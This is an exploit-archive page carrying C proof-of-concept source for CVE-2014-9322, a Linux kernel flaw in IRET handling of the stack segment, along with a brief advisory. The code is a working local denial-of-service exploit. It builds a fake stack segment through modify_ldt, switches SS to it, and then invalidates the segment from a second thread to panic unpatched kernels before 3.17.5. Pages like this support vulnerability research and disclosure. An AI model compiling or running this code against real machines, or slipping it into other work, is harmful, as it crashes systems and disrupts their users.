what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux CVE-2014-9322 Proof Of Concept

Linux CVE-2014-9322 Proof Of Concept
Posted Mar 2, 2015
Authored by Emeric Nasi

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to gain privileges by triggering an IRET instruction that leads to access to a GS Base address from the wrong space. This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.

tags | exploit, x86, kernel, local
systems | linux
advisories | CVE-2014-9322
SHA-256 | 4af67f178eb58a164b5111e77b240cd7ee040f47573670c05d5a9905efc16e21

Linux CVE-2014-9322 Proof Of Concept

Change Mirror Download

/* ----------------------------------------------------------------------------------------------------
* cve-2014-9322_poc.c
*
* arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
* properly handle faults associated with the Stack Segment (SS) segment
* register, which allows local users to gain privileges by triggering an IRET
* instruction that leads to access to a GS Base address from the wrong space.
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
*
* I have no merit to writing this poc, I just implemented first part of Rafal Wojtczuk article (this guy is a genius!)
* More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
*
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c -lpthread
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/

// Only works on x86_64 platform
#ifdef __x86_64__

/* ----------------------- Includes ----------------------------*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <asm/ldt.h>
#include <pthread.h>
#include <sys/time.h>
#include <inttypes.h>
#include <stdbool.h>
#include <errno.h>
#include <sys/user.h>



/* ----------------------- definitions ----------------------------*/


#define TARGET_KERNEL_MIN "3.0.0"
#define TARGET_KERNEL_MAX "3.17.4"
#define EXPLOIT_NAME "cve-2014-9322"
#define EXPLOIT_TYPE DOS


#define FALSE_SS_BASE 0x10000UL
#define MAP_SIZE 0x10000


/* ----------------------- Global variables ----------------------------*/


struct user_desc new_stack_segment;


/* ----------------------- functions ----------------------------*/


/**
* Creates a new segment in Local Descriptor Table
*/
static bool add_ldt(struct user_desc *desc, const char *name)
{
if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0)
{
return true;
}
else
{
printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
printf("modify_ldt failed, %s\n", strerror(errno));
return false;
}
}


int FLAG = 0;

void * segManipulatorThread(void * none)
{
new_stack_segment.entry_number = 0x12;
new_stack_segment.base_addr = 0x10000;
new_stack_segment.limit = 0xffff;
new_stack_segment.seg_32bit = 1;
new_stack_segment.contents = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
new_stack_segment.read_exec_only = 0;
new_stack_segment.limit_in_pages = 0;
new_stack_segment.seg_not_present = 0;
new_stack_segment.useable = 0;
new_stack_segment.lm = 0;

// Create a new stack segment
add_ldt(&new_stack_segment, "newSS");

// Wait for main thread to use new stack segment
sleep(3);

// Invalidate stack segment
new_stack_segment.seg_not_present = 1;
add_ldt(&new_stack_segment, "newSS disable");
FLAG = 1;
sleep(15);

return NULL;
}

/**
* DOS poc for cve_2014_9322 vulnerability
*/
int main()
{

pthread_t thread1;
uint8_t *code;

printf("[cve_2014_9322]: Preparing to exploit.\n");

// map area for false SS
code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
if (code != (uint8_t *) FALSE_SS_BASE)
{
fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
return -1;
}

printf("[cve_2014_9322]: Panic!\n");
if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0)
{
perror("[cve_2014_9322 error]: pthread_create");
return false;
}

// Wait for segManipulatorThread to create new stack segment
sleep(1);

// Set stack segment to newly created one in segManipulatorThread
asm volatile ("mov %0, %%ss;"
:
:"r" (0x97)
);

while(FLAG == 0){};
sleep(4);

return 0;
}


#endif // __x86_64__
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close